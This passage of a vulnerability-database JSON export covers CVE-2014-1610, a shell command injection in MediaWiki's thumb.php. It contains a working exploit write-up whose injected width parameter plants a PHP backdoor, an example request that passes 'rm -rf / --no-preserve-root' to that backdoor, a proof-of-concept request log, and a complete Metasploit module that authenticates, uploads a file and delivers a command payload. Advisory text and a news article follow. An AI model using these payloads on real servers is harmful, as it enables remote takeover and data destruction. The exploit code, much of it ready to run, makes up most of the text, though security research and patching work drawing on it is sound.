"obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-01T00:00:00", "id": "EXPLOITPACK:740983D0417678074247C5AE47DBBED6", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n####################################################################\n#\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\n# Affected website : Wikipedia.org and more !\n#\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\n# Release dates : Feb 1, 2014\n# Special Thanks to 2600 Thailand !\n#\n####################################################################\n\n# Exploit:\n####################################################################\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\nhttp://vulnerable-site/index.php/Special:Upload\n2. inject os cmd to upload a php-backdoor\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\n3. access to php-backdoor!\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\n4. happy pwning!!\n\n\n# Related files:\n####################################################################\nthumb.php <-- extract all _GET array to params\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\noptions\n/includes/media/ImageHandler.php\n/includes/GlobalFunctions.php\n/includes/filerepo/file/File.php\n\n# Vulnerability Analysis:\n####################################################################\n1. thumb.php\nThis script used to resize images if it is configured to be done\nwhen the web browser requests the image\n<? ...\n1.1 Called directly, use $_GET params\nwfThumbHandleRequest();\n1.2 Handle a thumbnail request via query parameters\nfunction wfThumbHandleRequest() {\n$params = get_magic_quotes_gpc()\n? 
array_map( 'stripslashes', $_GET )\n: $_GET; << WTF\n\nwfStreamThumb( $params ); // stream the thumbnail\n}\n1.3 Stream a thumbnail specified by parameters\nfunction wfStreamThumb( array $params ) {\n...\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\nuploaded.pdf file here\n...\n// Backwards compatibility parameters\nif ( isset( $params['w'] ) ) {\n$params['width'] = $params['w']; // << Inject os cmd here!\nunset( $params['w'] );\n}\n...\n$img = wfLocalFile( $fileName );\n...\n// Thumbnail isn't already there, so create the new thumbnail...\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\nby width/height\n...\n// Stream the file if there were no errors\n$thumb->streamFile( $headers );\n...\n?>\n2. /includes/filerepo/file/File.php\n<? ...\nfunction transform( $params, $flags = 0 ) { ...\n$handler = $this->getHandler(); // << PDF Handler\n...\n$normalisedParams = $params;\n$handler->normaliseParams( $this, $normalisedParams );\n...\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\n..\n?>\n3. /extensions/PdfHandler/PdfHandler_body.php\n<? ...\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\n...\n$width = $params['width'];\n...\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\nparameters\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\n-dLastPage={$page}\";\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\n$srcPath );\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\nargument\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\n$cmd .= \" 2>&1\";\n...\n$err = wfShellExec( $cmd, $retval );\n...\n?>\n4. /includes/GlobalFunctions.php\nExecute a shell command, with time and memory limits\n<? 
...\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\narray() ) {\n...\npassthru( $cmd, $retval ); // << Execute here!!\n\n# Proof-Of-Concept\n####################################################################\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\nHTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\n\n<html><head><title>Error generating thumbnail</title></head>\n<body>\n<h1>Error generating thumbnail</h1>\n<p>\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\nconvert: option requires an argument `-resize' @\nerror/convert.c/ConvertImageCommand/2380.<br />\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\n\n</p>\n\n</body>\n</html>\n\n\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\n\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n\n# Back-end $cmd\n####################################################################\nGlobalFunctions.php : wfShellExec()\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\nsystem(\\\\$_GET[1]);\">images/longcat.php` 
-\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "MediaWiki contains a flaw that is due to the program failing to properly sanitize input passed via the \"page\" parameter in the thumb.php script. 
This may allow a remote attack to inject arbitrary shell commands.\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "dsquare", "title": "MediaWiki thumb.php page Parameter Remote Shell Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2013-04-02T00:00:00", "id": "E-382", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T14:53:18", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "MediaWiki Thumb.php - Remote Command Execution", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85082", "id": "SSV:85082", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload 
support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "\\r\\n",\r\n 'PrependEncoder' => "php -r \\"",\r\n 'AppendEncoder' => "\\""\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),\r\n OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),\r\n OptString.new('PASSWORD', [ false, "Password to authenticate with", '' 
])\r\n ], self.class)\r\n end\r\n\r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\r\n\r\n unless meta_generator\r\n vprint_status("No META Generator tag on #{full_uri}.")\r\n return nil, nil, nil\r\n end\r\n\r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status("#{meta_generator} detected.")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")\r\n\r\n return major, minor, patch\r\n end\r\n\r\n return nil, nil, nil\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n\r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n\r\n response = send_request_cgi!(opts)\r\n\r\n if opts['redirect_uri']\r\n vprint_status("Redirected to #{opts['redirect_uri']}.")\r\n end\r\n\r\n unless response\r\n vprint_status("No response from #{full_uri}.")\r\n return CheckCode::Unknown\r\n end\r\n\r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status("#{response.code} response received...")\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n\r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n vprint_status("Received response code #{response.code} from #{full_uri}")\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n uri = target_uri.path\r\n\r\n print_status("Grabbing version and login CSRF token...")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 
'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n\r\n unless response\r\n fail_with(Failure::NotFound, "Failed to retrieve webpage.")\r\n end\r\n\r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status("Windows platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status("Nix platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n\r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n\r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n\r\n session_cookie = response.get_cookies\r\n\r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n\r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find login token. 
Is URI set correctly?")\r\n else\r\n print_good("Retrieved login CSRF token.")\r\n end\r\n\r\n print_status("Attempting to login...")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n\r\n if login and login.code == 302\r\n print_good("Log in successful.")\r\n else\r\n fail_with(Failure::NoAccess, "Failed to log in.")\r\n end\r\n\r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n\r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n\r\n print_status("Getting upload CSRF token...") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, "Failed to access file upload page.")\r\n end\r\n\r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n\r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find upload token. 
Is URI set correctly?")\r\n elsif upload_csrf\r\n print_good("Retrieved upload CSRF token.")\r\n end\r\n\r\n upload_mime = Rex::MIME::Message.new\r\n\r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))\r\n file_name = "#{rand_text_alpha(4)}.djvu"\r\n\r\n upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\\"wpUploadFile\\"; filename=\\"#{file_name}\\"")\r\n upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\\"wpDestFile\\"")\r\n upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\\"wpUploadDescription\\"")\r\n upload_mime.add_part("", nil, nil, "form-data; name=\\"wpLicense\\"")\r\n upload_mime.add_part("1",nil,nil, "form-data; name=\\"wpIgnoreWarning\\"")\r\n upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\\"wpEditToken\\"") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, "form-data; name=\\"title\\"")\r\n upload_mime.add_part("1", nil, nil, "form-data; name=\\"wpDestFileWarningAck\\"")\r\n upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\\"wpUpload\\"")\r\n post_data = upload_mime.to_s\r\n\r\n print_status("Uploading DjVu file #{file_name}...")\r\n\r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}",\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good("File uploaded to #{location}")\r\n else\r\n if upload.body.include? 
'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")\r\n else\r\n fail_with(Failure::UnexpectedReply, "Failed to upload file.")\r\n end\r\n end\r\n\r\n payload_request(uri, file_name, my_platform)\r\n end\r\n\r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = "1)&(#{payload.encoded})&"\r\n else\r\n trigger = "1;#{payload.encoded};"\r\n end\r\n\r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")\r\n end\r\n\r\n print_status("Sending payload request...")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n\r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error("File: #{file_name} does not exist.")\r\n elsif r\r\n print_error("Received response #{r.code}, exploit probably failed.")\r\n end\r\n end\r\n\r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n\r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name="#{name}".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n\r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n\r\n ''\r\n end\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85082", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:34:30", 
"description": "CVE ID:CVE-2014-1610\r\n\r\nMediaWiki\u662f\u7f8e\u56fd\u7ef4\u57fa\u5a92\u4f53\uff08Wikimedia\uff09\u57fa\u91d1\u4f1a\u548cMediaWiki\u5fd7\u613f\u8005\u5171\u540c\u5f00\u53d1\u7ef4\u62a4\u7684\u4e00\u5957\u81ea\u7531\u514d\u8d39\u7684\u57fa\u4e8e\u7f51\u7edc\u7684Wiki\u5f15\u64ce\uff0c\u5b83\u53ef\u7528\u4e8e\u90e8\u7f72\u5185\u90e8\u7684\u77e5\u8bc6\u7ba1\u7406\u548c\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u3002 \r\n\r\nMediaWiki\u4e2d\u5b58\u5728\u8f93\u5165\u9a8c\u8bc1\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8ethumb.php\u811a\u672c\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u2018page\u2019\u53c2\u6570\u3002\u5f53\u542f\u7528\u652f\u6301\u4e0a\u4f20DjVu\u6216PDF\u6587\u4ef6\u65f6\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9\u7279\u5236\u7684shell\u5143\u5b57\u7b26\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u4ee5\u4e0b\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aMediaWiki 1.22.2\u4e4b\u524d\u76841.22.x\u7248\u672c\uff0c1.21.5\u4e4b\u524d\u76841.21.x\u7248\u672c\uff0c1.19.11\u4e4b\u524d\u76841.19.x\u7248\u672c\u3002\n0\nMediaWiki <= 1.22.1\r\nMediaWiki <= 1.21.4\r\nMediaWiki <= 1.19.10\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMediaWiki\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a \r\n\r\nhttp://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html", "cvss3": {}, "published": "2014-02-13T00:00:00", "type": "seebug", "title": "MediaWiki\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61437", "id": "SSV:61437", "sourceData": "\n GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: 
keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61437", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-01-27T09:17:42", "description": "[](<https://4.bp.blogspot.com/-K0XlEYvexd8/UuolXbDRtQI/AAAAAAAAAS0/NGDSXCuuLJY/s1600/MediaWiki.jpg>)\n\nThe Encyclopedia giant **WIKIPEDIA** has been found vulnerable to [remote code execution](<https://thehackernews.com/search/label/remote%20code%20execution>) because of a critical flaw in _the MediaWiki software_.\n\n \n\n\nWikipedia is a name which has become a major source of information for all of us. 
It has webpages on almost every topic you need to search.\n\n \n\n\nThis giant is powered by open source wiki software called MediaWiki. MediaWiki powers not only Wikipedia but also a number of other wiki websites. The software is a product of the Wikimedia Foundation and is written in PHP with a database backend.\n\n \n\n\n_Check Point Software Technologies_ [found](<http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html>) a remote code execution vulnerability in MediaWiki: \"_This vulnerability affects all versions of MediaWiki from 1.8 onwards._\" \n \nThe vulnerability, assigned the ID [_CVE-2014-1610_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610>), allows an attacker to execute shell code remotely via an incorrectly sanitized parameter on the MediaWiki application server. \n\n> _\u201cShell meta characters can be passed in the page parameter to the thumb.php.\u201d [Bug 60339](<https://bugzilla.wikimedia.org/show_bug.cgi?id=60339>)._\n\n**MediaWiki announced [Security Releases](<https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html>) 1.22.2, 1.21.5 and 1.19.11:** \"_Your MediaWiki installation is affected by a remote code execution vulnerability if you have enabled file upload support for DjVu (natively supported by MediaWiki) or PDF files (in combination with the PdfHandler extension). Neither file type is enabled by default in MediaWiki installations. If you are affected, we strongly urge you to update immediately._\" \n \n**Key Findings:** The vulnerability could have turned Wikipedia\u2019s web servers into a malicious content distributor had it been left undiscovered. 
\n \n\"_Check Point promptly alerted the WikiMedia Foundation to the presence of this vulnerability, and after verifying it the Foundation released a software update to correct the issue._\"\n\n \n\n\nThe _Wikimedia Foundation_ released an update after learning of the vulnerability from Check Point. This is the 3rd 'remote code execution' [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) reported in the MediaWiki platform since 2006.\n\n \n\n\n\u201c_It only takes a single vulnerability on a widely adopted platform for a hacker to infiltrate and wreak widespread damage_,\u201d says Dorit Dor, vice president of products, Check Point Software Technologies. Check Point's Vulnerability Research Group assesses common software to ensure the security of Internet users. \n \nMediaWiki's latest version, _1.22.2 Stable_, is fully patched against this flaw, and Wikipedia has now been upgraded to it.\n\n \n\n\nBecause so many cyber security enthusiasts are working to find security loopholes in products available on the Internet, open source technology has become a top priority for security testing.\n", "cvss3": {}, "published": "2014-01-29T23:20:00", "type": "thn", "title": "MediaWiki Remote Code Execution vulnerability leaves Wikipedia open for Cyber attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-01-30T10:50:25", "id": "THN:14D220C3673BA5820F7A055DC2CB7A3A", "href": "https://thehackernews.com/2014/01/mediawiki-remote-code-execution.html", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}